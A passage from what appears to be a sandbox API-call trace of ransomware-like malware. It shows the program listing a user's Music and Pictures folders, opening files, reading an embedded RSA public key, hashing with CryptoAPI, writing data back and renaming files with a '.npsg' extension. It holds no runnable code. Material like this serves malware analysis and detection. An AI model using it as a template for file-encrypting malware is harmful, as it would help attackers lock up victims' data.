returned 1 [0238.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0238.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0238.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0238.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0238.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0238.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0238.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0238.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34009e0 [0238.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.264] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x5d22, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.264] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0238.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0238.264] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0238.264] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0238.264] CloseHandle (hObject=0x644) returned 1 [0238.267] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\_3Sp4lIgrh-.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\_3sp4ligrh-.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\_3Sp4lIgrh-.mp3.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\_3sp4ligrh-.mp3.npsg")) returned 1 [0238.268] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0238.268] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.268] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0238.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e690 | out: hHeap=0x620000) returned 1 [0238.270] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x454f540, ftCreationTime.dwHighDateTime=0x1d5be77, ftLastAccessTime.dwLowDateTime=0x63809380, ftLastAccessTime.dwHighDateTime=0x1d5b9a9, ftLastWriteTime.dwLowDateTime=0x63809380, ftLastWriteTime.dwHighDateTime=0x1d5b9a9, nFileSizeHigh=0x0, nFileSizeLow=0x5d22, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_3Sp4lIgrh-.mp3", cAlternateFileName="_3SP4L~1.MP3")) returned 0 [0238.270] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0238.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0238.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7caa0 | out: hHeap=0x620000) returned 1 [0238.270] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0238.270] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0238.270] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\") returned="2DVGfW2 wBKbSvaIoJ2e\\" [0238.270] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0238.270] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0238.270] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0238.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0238.270] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0238.270] PathFindFileNameW (pszPath="") returned="" [0238.270] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeab9eb60, ftCreationTime.dwHighDateTime=0x1d5c531, ftLastAccessTime.dwLowDateTime=0x38ed7b0, ftLastAccessTime.dwHighDateTime=0x1d5c46d, ftLastWriteTime.dwLowDateTime=0x38ed7b0, ftLastWriteTime.dwHighDateTime=0x1d5c46d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0238.272] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a2a8 | out: hHeap=0x620000) returned 1 [0238.272] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeab9eb60, ftCreationTime.dwHighDateTime=0x1d5c531, ftLastAccessTime.dwLowDateTime=0x38ed7b0, ftLastAccessTime.dwHighDateTime=0x1d5c46d, ftLastWriteTime.dwLowDateTime=0x38ed7b0, ftLastWriteTime.dwHighDateTime=0x1d5c46d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0238.272] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaff72640, ftCreationTime.dwHighDateTime=0x1d5b759, ftLastAccessTime.dwLowDateTime=0xc509e60, ftLastAccessTime.dwHighDateTime=0x1d5c477, ftLastWriteTime.dwLowDateTime=0xc509e60, ftLastWriteTime.dwHighDateTime=0x1d5c477, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lEiN6S__d", cAlternateFileName="LEIN6S~1")) returned 1 [0238.272] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb051cb30, ftCreationTime.dwHighDateTime=0x1d5c353, ftLastAccessTime.dwLowDateTime=0x5d2c2d60, ftLastAccessTime.dwHighDateTime=0x1d5bade, ftLastWriteTime.dwLowDateTime=0x5d2c2d60, ftLastWriteTime.dwHighDateTime=0x1d5bade, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lvw4jN8h", cAlternateFileName="")) returned 1 [0238.272] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x37d03500, ftCreationTime.dwHighDateTime=0x1d5c2ec, ftLastAccessTime.dwLowDateTime=0x98a7f9a0, ftLastAccessTime.dwHighDateTime=0x1d5b6ec, ftLastWriteTime.dwLowDateTime=0x98a7f9a0, ftLastWriteTime.dwHighDateTime=0x1d5b6ec, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OHXi", cAlternateFileName="")) returned 1 [0238.272] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89ca64d0, ftCreationTime.dwHighDateTime=0x1d5c1e2, ftLastAccessTime.dwLowDateTime=0x7982f250, ftLastAccessTime.dwHighDateTime=0x1d5c2bd, ftLastWriteTime.dwLowDateTime=0x7982f250, ftLastWriteTime.dwHighDateTime=0x1d5c2bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rJ-XhzoDCCMB9", cAlternateFileName="RJ-XHZ~1")) returned 1 [0238.272] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89ca64d0, ftCreationTime.dwHighDateTime=0x1d5c1e2, ftLastAccessTime.dwLowDateTime=0x7982f250, ftLastAccessTime.dwHighDateTime=0x1d5c2bd, ftLastWriteTime.dwLowDateTime=0x7982f250, ftLastWriteTime.dwHighDateTime=0x1d5c2bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rJ-XhzoDCCMB9", cAlternateFileName="RJ-XHZ~1")) returned 0 [0238.272] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0238.273] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0238.273] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.273] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0238.273] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0238.273] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lVTDtn H8OPDt\\") returned="lVTDtn H8OPDt\\" [0238.274] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0238.274] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0238.274] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0238.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0238.274] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0238.274] PathFindFileNameW (pszPath="") returned="" [0238.274] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lVTDtn H8OPDt\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x88ef9110, ftCreationTime.dwHighDateTime=0x1d5c125, ftLastAccessTime.dwLowDateTime=0xcb9a5d30, ftLastAccessTime.dwHighDateTime=0x1d5c41b, ftLastWriteTime.dwLowDateTime=0xcb9a5d30, ftLastWriteTime.dwHighDateTime=0x1d5c41b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0238.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.275] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x88ef9110, ftCreationTime.dwHighDateTime=0x1d5c125, ftLastAccessTime.dwLowDateTime=0xcb9a5d30, ftLastAccessTime.dwHighDateTime=0x1d5c41b, ftLastWriteTime.dwLowDateTime=0xcb9a5d30, ftLastWriteTime.dwHighDateTime=0x1d5c41b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0238.275] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13165b80, ftCreationTime.dwHighDateTime=0x1d5bcc1, ftLastAccessTime.dwLowDateTime=0x41f015c0, ftLastAccessTime.dwHighDateTime=0x1d5c12d, ftLastWriteTime.dwLowDateTime=0x41f015c0, ftLastWriteTime.dwHighDateTime=0x1d5c12d, nFileSizeHigh=0x0, nFileSizeLow=0x5c48, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gsPNvpvKbP2BeG.gif", cAlternateFileName="GSPNVP~1.GIF")) returned 1 [0238.275] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lVTDtn H8OPDt\\gsPNvpvKbP2BeG.gif") returned=".gif" [0238.275] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lVTDtn H8OPDt\\gsPNvpvKbP2BeG.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lvtdtn h8opdt\\gspnvpvkbp2beg.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0238.276] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=23624) returned 1 [0238.276] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0238.279] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x5c22, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.279] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0238.281] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x5c48, lpOverlapped=0x0) returned 1 [0238.282] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.282] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.282] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.282] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0238.283] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0238.283] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0238.283] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0238.283] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0238.283] GetLastError () returned 0x0 [0238.283] CryptDestroyHash (hHash=0x33f0408) returned 1 [0238.283] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0238.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0238.283] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0238.283] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0238.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.284] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0238.284] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5c50) returned 0x3b85cd0 [0238.284] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0238.284] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0238.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0238.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0238.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0238.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3409bd8 [0238.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400950 [0238.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3409c20 [0238.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400968 [0238.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400998 [0238.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34009f8 [0238.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34009b0 [0238.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0238.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0238.285] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0238.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0238.285] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400998 | out: hHeap=0x620000) returned 1 [0238.285] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34009b0 | out: hHeap=0x620000) returned 1 [0238.285] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34009f8 | out: hHeap=0x620000) returned 1 [0238.285] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0238.285] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34009f8 [0238.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0238.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34009b0 [0238.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0238.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400998 [0238.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0238.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b830 [0238.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0238.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0238.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0238.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b948 [0238.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0238.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0238.285] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0238.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34009b0 | out: hHeap=0x620000) returned 1 [0238.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0238.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400998 | out: hHeap=0x620000) returned 1 [0238.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0238.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0238.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34009f8 | out: hHeap=0x620000) returned 1 [0238.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0238.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0238.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0238.286] GetCurrentThreadId () returned 0x5b4 [0238.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0238.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b837e8 [0238.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0238.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0238.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0238.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0238.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0238.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.286] GetCurrentThreadId () returned 0x5b4 [0238.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x33c2ee8 [0238.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0238.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0238.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0238.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0238.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0238.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0238.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0238.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34009f8 [0238.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0238.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0238.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0238.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0238.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0238.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0238.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0238.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400998 [0238.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0238.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0238.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 